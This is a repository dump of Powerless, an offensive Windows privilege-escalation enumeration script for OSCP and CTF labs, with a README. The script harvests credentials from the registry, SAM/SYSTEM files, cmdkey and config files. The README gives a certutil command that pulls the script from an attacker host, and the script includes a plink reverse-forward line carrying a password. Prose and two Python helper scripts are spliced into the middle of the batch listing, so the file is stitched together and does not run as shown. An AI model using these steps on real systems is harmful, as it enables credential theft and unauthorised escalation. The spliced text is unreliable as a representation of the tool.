├── Powerless.bat
└── README.md

/Powerless.bat:
--------------------------------------------------------------------------------

```bat
@echo off
:: Remember the launch directory: the unquoted-service-path check below returns to it (cd %userprofile%) to write its temporary files
set userprofile=%cd%
mode con:cols=160 lines=9999
Cd c:\

echo ------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------
:: https://github.com/GDSSecurity/Windows-Exploit-Suggester
systeminfo
echo.

echo ----- Architecture -------
SET Processor
echo.

echo ------ Users and groups (check individual user with 'net user USERNAME') Check user privileges for SeImpersonate (rotten potato exploit) -------
:: Note: in CTF boxes it's not uncommon to see other low level users on the machine. It can be a temptation to want to always skip to Administrator, but sometimes it is essential that you elevate privileges to that of a different user first before being able to get admin rights. Once you get that user's rights, pay close attention to their user folder.
echo Current User: %username%
whoami /all
echo --- All users, accounts and groups ---
net users
net accounts
net localgroup

echo ------- Administrators --------
net localgroup administrators

echo ------- Environment Variables -------
set
echo.

echo ------- Additional Drives (if not run as part of a batch job replace double percent with single percent sign)--------
for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul
echo.

echo ---------------------------------------- Search for Quick Wins --------------------------------------
echo -------- Listing contents of user directories ---------
:: In CTF machines it is VERY common for there to be artifacts used for privilege escalation within user directories. Pay special attention to files that may contain credentials, or files that may be used as part of a scheduled task. You can typically ignore most default Windows files (some of which have been filtered out as part of this script).
dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
echo.

echo -------- Exploring program directories and C:\ ---------
:: These directory listings are not recursive. They are meant to give you a general overview of the programs installed on the system. Searchsploit every (non default/windows) program version, and check each program config for creds.
echo --- Program Files ---
dir "C:\Program Files" /b
echo --- Program Files (x86) ---
dir "C:\Program Files (x86)" /b
echo --- Root of C:\ ----
dir "C:\" /b
echo.

echo --- Inetpub (any config files in here? May need to manually drill into this folder if it exists) ---
:: The root web folder can at times be extensive, and thus we do not always want to show a recursive listing of its contents in this script, but it should always be investigated regardless.
dir /a /b C:\inetpub\

echo --- Broad search for Apache or Xampp ---
dir /s /b apache* xampp*
echo.

echo ---Search for Configuration and sensitive files---
echo -- Broad search for config files --
:: If the .NET framework is installed you will get a bunch of config files which are typically default and can be ignored. The more you practice priv esc, the more you'll learn which files can be ignored and which you should give a closer eye to.
dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config
echo -- Application Host File --
type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul
echo -- Broad search for unattend or sysprep files --
dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml*
echo -- Stored Passwords --
:: To use stored cmdkey credentials use runas with the /savecred flag (e.g. runas /savecred /user:ACCESS\Administrator "ping 10.10.10.9")
cmdkey /list
echo.

echo -- Checking for any accessible SAM or SYSTEM files --
dir %SYSTEMROOT%\repair\SAM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
dir %SYSTEMROOT%\System32\config\SAM 2>nul
dir %SYSTEMROOT%\repair\system 2>nul
dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
dir /a /b /s SAM.b*
echo.

echo -- Broad search for vnc kdbx or rdp files --
dir /a /s /b *.kdbx *vnc.ini *.rdp
echo.

echo --- Searching Registry for Passwords ---
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query HKLM /f password /t REG_SZ /s /k
reg query HKCU /f password /t REG_SZ /s /k
reg query "HKCU\Software\ORL\WinVNC3\Password"
:: Key name fixed: the hive path is CurrentControlSet (one word), the original "Current\ControlSet" never matched
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
echo.

echo --- AlwaysInstallElevated Check ---
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
echo.

echo --- Program Files and User Directories where everybody (or users) have full or modify permissions ---
where /q icacls
IF ERRORLEVEL 1 (
echo icacls is missing, performing checks using cacls for older versions of Windows
FOR /F "tokens=* USEBACKQ" %%F IN (`where cacls`) DO (SET cacls_exe=%%F)
) ELSE (
FOR /F "tokens=* USEBACKQ" %%F IN (`where icacls`) DO (SET cacls_exe=%%F)
)
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
%cacls_exe% "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
%cacls_exe% "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
```
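The permissions block above greps raw cacls/icacls output for `(F)` or `(M)` on lines that also name Everyone or BUILTIN\Users. That misses the granular rights icacls can print, and it loses the path when an ACE sits on a continuation line. The Python below is an added example, not part of Powerless: it parses icacls output properly (path carried across continuation lines, inheritance flags separated from rights), flags write-capable ACEs for Everyone, BUILTIN\Users and Authenticated Users, and produces the `icacls /remove:g` line an administrator would start from to fix each finding. It generalizes the page's (F)/(M) test to W and to the granular write rights WD, AD, WDAC, WO and DC. The sample output, the principal regex and the remediation string are this example's own constructions.

```python
import re
from dataclasses import dataclass

# Principals the script's cacls/icacls greps look for (Everyone, BUILTIN\Users),
# plus Authenticated Users, which its accesschk section also tests. Compared
# case-insensitively because icacls casing varies between Windows versions.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
}

# Simple rights that allow replacing or altering content, and the granular
# rights that amount to the same thing (generalizes the page's (F)/(M) test).
SIMPLE_WRITE_RIGHTS = {"F", "M", "W"}
GRANULAR_WRITE_RIGHTS = {"WD", "AD", "WDAC", "WO", "DC"}
INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}

# One ACE line: optional path (first line of an entry), then principal:(flags)(rights).
# The principal alternatives are this example's assumption about icacls naming.
ACE_RE = re.compile(
    r"^(?P<lead>.*?)\s*"
    r"(?P<principal>(?:NT AUTHORITY|NT SERVICE|APPLICATION PACKAGE AUTHORITY|BUILTIN)\\[^:]+"
    r"|[A-Za-z0-9_.$-]+\\[^:\s]+"
    r"|Everyone|CREATOR OWNER)"
    r":(?P<rights>(?:\([^)]*\))+)\s*$"
)

# Constructed icacls output, in the shape `icacls "C:\Program Files\*"` prints.
SAMPLE_ICACLS = r"""
C:\Program Files\Common Files NT SERVICE\TrustedInstaller:(F)
                              NT SERVICE\TrustedInstaller:(OI)(CI)(IO)(F)
                              NT AUTHORITY\SYSTEM:(M)
                              BUILTIN\Administrators:(M)
                              BUILTIN\Users:(RX)
C:\Program Files\Example Vendor Tool Everyone:(OI)(CI)(F)
                                     BUILTIN\Administrators:(OI)(CI)(F)
C:\Program Files\Legacy Agent BUILTIN\Users:(OI)(CI)(M)
                              NT AUTHORITY\SYSTEM:(OI)(CI)(F)
C:\Program Files\Another App NT AUTHORITY\Authenticated Users:(OI)(CI)(WD,AD)
                             BUILTIN\Users:(RX)

Successfully processed 4 files; Failed processing 0 files
"""


@dataclass
class WeakAce:
    path: str
    principal: str
    rights: str

    def remediation(self) -> str:
        """Starting point for a fix: drop every right granted to the principal."""
        return f'icacls "{self.path}" /remove:g "{self.principal}"'


def parse_icacls(output: str):
    """Yield (path, principal, rights) for each ACE in icacls output.

    icacls prints the path only on an entry's first line; continuation lines
    are indented and carry further ACEs for the same path.
    """
    current_path = None
    for line in output.splitlines():
        m = ACE_RE.match(line.rstrip())
        if not m:
            continue  # blank lines, the trailer, or a principal form this parser does not know
        if m.group("lead"):
            current_path = m.group("lead")
        if current_path is not None:
            yield current_path, m.group("principal"), m.group("rights")


def rights_grant_write(rights: str) -> bool:
    """True if a rights string such as (OI)(CI)(M) or (WD,AD) grants a write-capable right."""
    for token in re.findall(r"\(([^)]*)\)", rights):
        parts = {p.strip() for p in token.split(",")}
        if parts <= INHERITANCE_FLAGS:
            continue  # (OI)(CI)(IO) describe inheritance, not permissions
        if parts & (SIMPLE_WRITE_RIGHTS | GRANULAR_WRITE_RIGHTS):
            return True
    return False


def find_weak_aces(output: str) -> list:
    """Return the ACEs that give a low-privileged principal write access."""
    return [
        WeakAce(path, principal, rights)
        for path, principal, rights in parse_icacls(output)
        if principal.lower() in LOW_PRIV_PRINCIPALS and rights_grant_write(rights)
    ]


if __name__ == "__main__":
    for ace in find_weak_aces(SAMPLE_ICACLS):
        print(f"{ace.path}  {ace.principal}  {ace.rights}\n    fix: {ace.remediation()}")
```

Feed it the captured text of `icacls "C:\Program Files\*"` (or the x86 and user-directory variants the script runs) instead of the sample; the output lists each weak ACE with a remediation line to review before applying.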
```bat
echo.

echo ---Domain joined? If so check domain controller for GPP files ----
set user
echo.

cd %userprofile%
echo ---Unquoted Service Paths (requires that the directory from which this script is run is user writeable. If it is not, you can use the WMIC command below) ---
REM wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
sc query state= all > scoutput.txt
findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt
FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt
FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt
find /v """" path.txt > unquotedpaths.txt
sort unquotedpaths.txt|findstr /i /v C:\WINDOWS
del /f Servicenames.txt
del /f services.txt
del /f path.txt
del /f scoutput.txt
del /f unquotedpaths.txt
echo.

echo --------------- AccessChk (checks permissions for Authenticated Users, Everyone, and Users)------------------
reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f

echo --- Accesschk World writeable folders and files ----
accesschk.exe -uwdqs "Users" c:\ /accepteula
accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula
accesschk.exe -qwsu "Everyone" * /accepteula
accesschk.exe -qwsu "Authenticated Users" * /accepteula
accesschk.exe -qwsu "Users" * /accepteula
echo.
echo --- Accesschk services with weak permissions ---
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
echo.
```
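The unquoted service path block above keeps every BINARY_PATH_NAME that contains no quote character and then filters out C:\WINDOWS, so it also lists paths that are unquoted but harmless (no space in the image path). The Python below is an added example, not part of Powerless: it parses `sc qc` output and applies the actual condition, an unquoted image path that contains a space, which is the case where Windows tries each space-delimited prefix as a candidate executable. It generalizes the page's check without the directory filter and emits the `sc config ... binPath=` line an administrator uses to quote the path. The sample output is constructed; the service names and paths in it are invented.

```python
import re

# Field lines inside an `sc qc` block look like "        BINARY_PATH_NAME   : value".
FIELD_RE = re.compile(r"^\s+([A-Z_]+)\s*:\s?(.*)$")
# The image is everything up to the first ".exe"; anything after a space is arguments.
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)(?P<args>\s.*|$)", re.IGNORECASE)

# Constructed output of three `sc qc` calls concatenated, as the script's loop produces.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ExampleAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Example Vendor\Agent\agentsvc.exe -run
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Example Agent
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: QuotedSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Quoted Vendor\quoted.exe" -service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Quoted Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Dhcp
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
        LOAD_ORDER_GROUP   : TDI
        TAG                : 0
        DISPLAY_NAME       : DHCP Client
        DEPENDENCIES       : NSI
                           : Tdx
        SERVICE_START_NAME : NT Authority\LocalService
"""


def parse_sc_qc(output: str) -> dict:
    """Parse one or more concatenated `sc qc` outputs into {service: {field: value}}."""
    services, current = {}, None
    for line in output.splitlines():
        if line.startswith("SERVICE_NAME:"):
            current = line.split(":", 1)[1].strip()
            services[current] = {}
            continue
        m = FIELD_RE.match(line)
        if current is not None and m:  # "[SC] ..." and continuation lines do not match
            services[current][m.group(1)] = m.group(2).strip()
    return services


def unquoted_path_issue(bin_path: str):
    """Return the image path when it is unquoted and contains a space, else None.

    Quoted paths, paths without spaces and non-.exe images (drivers) are
    reported as fine, which is what separates this from the page's grep.
    """
    if not bin_path or bin_path.startswith('"'):
        return None
    m = IMAGE_RE.match(bin_path)
    if not m or " " not in m.group("image"):
        return None
    return m.group("image")


def find_unquoted_service_paths(output: str) -> list:
    """Return a finding per affected service, with the `sc config` line that quotes it."""
    findings = []
    for name, fields in parse_sc_qc(output).items():
        bin_path = fields.get("BINARY_PATH_NAME", "")
        image = unquoted_path_issue(bin_path)
        if image is None:
            continue
        args = bin_path[len(image):]
        findings.append({
            "service": name,
            "start_type": fields.get("START_TYPE", ""),
            "image": image,
            # Quoting the image is the fix; the inner \" escapes survive cmd's parsing.
            "fix": f'sc config "{name}" binPath= "\\"{image}\\"{args}"',
        })
    return findings


if __name__ == "__main__":
    for f in find_unquoted_service_paths(SAMPLE_SC_QC):
        print(f"{f['service']} ({f['start_type']}): {f['image']}\n    fix: {f['fix']}")
```

Run it over the concatenated `sc qc` text the script collects in path.txt (captured before the `findstr "BINARY_PATH_NAME"` filter) to get one finding per genuinely affected service; auto-start services are the ones to fix first.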
```bat
echo --- Accesschk services that we can change registry values for (such as ImagePath) ---
accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula
echo.
echo ---------------------------------------- End Search for Quick Wins --------------------------------------

cd c:\
echo ------- Powershell existence/version check -------
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion

echo ------- Network shares -------
net share

echo ------- Programs that run at startup ------
:: Note: on some legacy Windows editions WMIC may fail to install/start/freeze, in which case you'll need to comment out any calls to wmic
wmic startup get caption,command

echo -------- Path (is dll hijacking possible?) ------
echo Getting system + user path from command line (check permissions using cacls [path] or accesschk.exe -dqv [path])...
echo %path%
echo.
:: I couldn't find a way to only get the system path in DOS (the user path does not matter for the purpose of dll hijacking). If powershell is available you can use the folderperm.ps1 script
:: https://github.com/ankh2054/windows-pentest/blob/master/Powershell/folderperms.ps1
:: powershell.exe -ExecutionPolicy Bypass -noLogo -Command "[Environment]::GetEnvironmentVariable('Path', [System.EnvironmentVariableTarget]::Machine)"
:: Or let the script do all the work for you
:: powershell.exe -executionpolicy bypass -file folderperm.ps1

echo ------- Scheduled Tasks Names Only -------
:: Look for any interesting/non-standard scheduled tasks, then view the scheduled task details list below to get a better idea of what that task is doing and who is running it.
schtasks /query /fo LIST 2>nul | findstr "TaskName"
echo.

echo ------- Scheduled Tasks Details (taskname, author, command run, run as user) -------
schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:"
echo.

echo ------- Services Currently Running (check for Windows Defender or Anti-virus) ---------
net start
echo.

echo ------- Link Running Processes to started services --------
tasklist /SVC
echo.

echo ------- Processes verbose output (who is running what?) --------
:: Pay close attention to this list, especially for those tasks run by a user other than your own.
tasklist /v
echo.

echo ------- Patches (also listed as part of systeminfo) -------
:: Note: on some legacy Windows editions WMIC may fail to install/start/freeze, in which case you'll need to comment out any calls to wmic
:: Systeminfo may at times fail to list all patches (instead showing 'file x' or something along those lines), in which case it's important to have this fallback.
wmic qfe get Caption,Description,HotFixID,InstalledOn

echo ------- Firewall ------
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall dump

echo ------ Network information ------
ipconfig /all

:: Routing and ARP tables are accessible with these commands... uncomment if you wish, I didn't typically find them helpful for priv esc.
REM route print
REM arp -a
echo.

echo ------- Current connections and listening ports -------
:: Reverse port forward anything that is not accessible remotely, and run nmap on it. If SMB is available locally, do you have creds or hashes you can pass through it after port forwarding?
netstat -ano
echo.
echo ------- REVERSE PORT FORWARD MULTIPLE PORTS AT ONCE: plink.exe -l username -pw mysecretpassword -P [port] 10.11.0.108 -R 8080:127.0.0.1:8080 -R 8000:127.0.0.1:8000 -R 443:127.0.0.1:443 ------------
echo.

echo --- Broad search for any possible config files which may contain passwords ---
:: The following broad config file and credential searches could result in many results. They are meant as a fallback once you have already done thorough enumeration of user directories, web directories, and program directories (in addition to having pillaged the db).
dir /s /b *pass* *cred* *vnc* *.config*
echo.

echo --- Starting broad search in the background for any files with the word password in it. Press enter to get status occasionally --
start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul
echo.
```

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Powerless
A Windows privilege escalation (enumeration) script designed with OSCP labs (i.e. legacy Windows machines without Powershell) in mind.
The script represents a conglomeration of various privilege escalation checks, gathered from various sources, all done via native Windows binaries present in almost every version of Windows.

Note that the batch file also operates on the latest versions of Windows. PowerShell is not necessary to achieve proper OS enumeration.

# Use
Copy the batch file from your attacker machine to a user-writeable directory on the victim machine (typically the current user's folder or the "Public" user folder will be writeable).

Also (although the script will run without it), it is recommended you copy (an older version of) AccessChk.exe to the same location. An older version is recommended because the latest version will not work on some older Windows machines. The archived version here worked well in my experience (thanks, g0tmi1k): https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

There are many ways to copy over files. I found certutil.exe to be the most reliable across Windows editions. For example:

    certutil.exe -urlcache -split -f "http://$IP/Powerless.bat" Powerless.bat

The script may generate a lot of output. My recommended approach is to go through it sequentially, making a list of 'interesting' things to look at and sorting them as you go. Once you've reached the end of the output, go through your list in order of what stuck out the most.

You will do yourself a great disservice if you lean heavily on kernel exploits at the expense of thorough Windows enumeration. Although you may find kernel exploits often work in the labs, try to find other avenues as well. The script has comments sprinkled throughout to try to provide guidance on what to look for.

# Recommended OSCP-like Windows Hack The Box machines
Regrettably, the vast majority of HTB Windows machines require kernel exploits for privilege escalation.
I found the following machines helpful for practicing priv esc (read: not your typical privilege escalation).

- Chatterbox
- Jeeves
- Access
- Active
- SecNotes

# Sources
- http://www.fuzzysecurity.com/tutorials/16.html
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
--------------------------------------------------------------------------------